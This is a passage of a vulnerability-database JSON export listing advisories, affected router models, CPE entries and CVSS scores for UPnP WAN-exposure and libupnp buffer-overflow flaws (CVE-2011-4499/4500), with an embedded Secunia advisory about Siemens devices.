"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4500"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4500"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52445"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:04.793000",
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52445"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-22T11:55:04.793000",
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"date": "2011-11-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
],
"trust": 0.6
}
}
VAR-201111-0178
Vulnerability from variot - Updated: 2023-12-18 12:09The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5 Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1 Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1 Cisco Linksys WRT54GX firmware 2.00.05 Edimax BR-6104K prior to 3.25 Edimax 6114Wg Canyon-Tech CN-WF512 firmware version 1.83 Canyon-Tech CN-WF514 firmware version 2.08 Sitecom WL-153 prior to firmware 1.39 Sitecom WL-111 Sweex LB000021 firmware version 3.15 ZyXEL P-330W SpeedTouch 5x6 firmware versions prior to 6.2.29 Thomson TG585 firmware versions prior to 7.4.3.2. A vulnerability exists in the UPnP IGD installation and enablement of multiple versions of the Broadcom UPnP stack on the Cisco Linksys WRT54G. This vulnerability is related to the "external forwarding" vulnerability. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0178",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linksys wrt54gs router",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "2.09.1"
},
{
"model": "linksys wrt54g router",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.03.9"
},
{
"model": "linksys wrt54g router",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.20.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.2"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.0"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "3.0"
},
{
"model": "linksys wrt54gs router",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.06"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "4.0"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.0"
},
{
"model": "linksys wrt54gs router",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "4.70.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "linksys wrt54g router",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "4.20.8"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "linksys wrt54g router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "linksys wrt54gs router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "wrt54g",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "firmware 4.30.5"
},
{
"model": "wrt54gs",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "v1 from v3 firmware 4.71.1"
},
{
"model": "wrt54gs",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "v4 firmware 1.06.1"
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "linksys wrt54gs router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "4.70.6"
},
{
"model": "linksys wrt54g router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "4.20.8"
},
{
"model": "linksys wrt54gs router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.06"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:3.03.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:4.20.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.20.8",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:2.09.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.70.6",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gs:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gs:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gs:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gs:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4499"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4499",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4499",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52444",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4499",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-361",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52444",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. A vulnerability exists in the UPnP IGD installation and enablement of multiple versions of the Broadcom UPnP stack on the Cisco Linksys WRT54G. This vulnerability is related to the \"external forwarding\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA 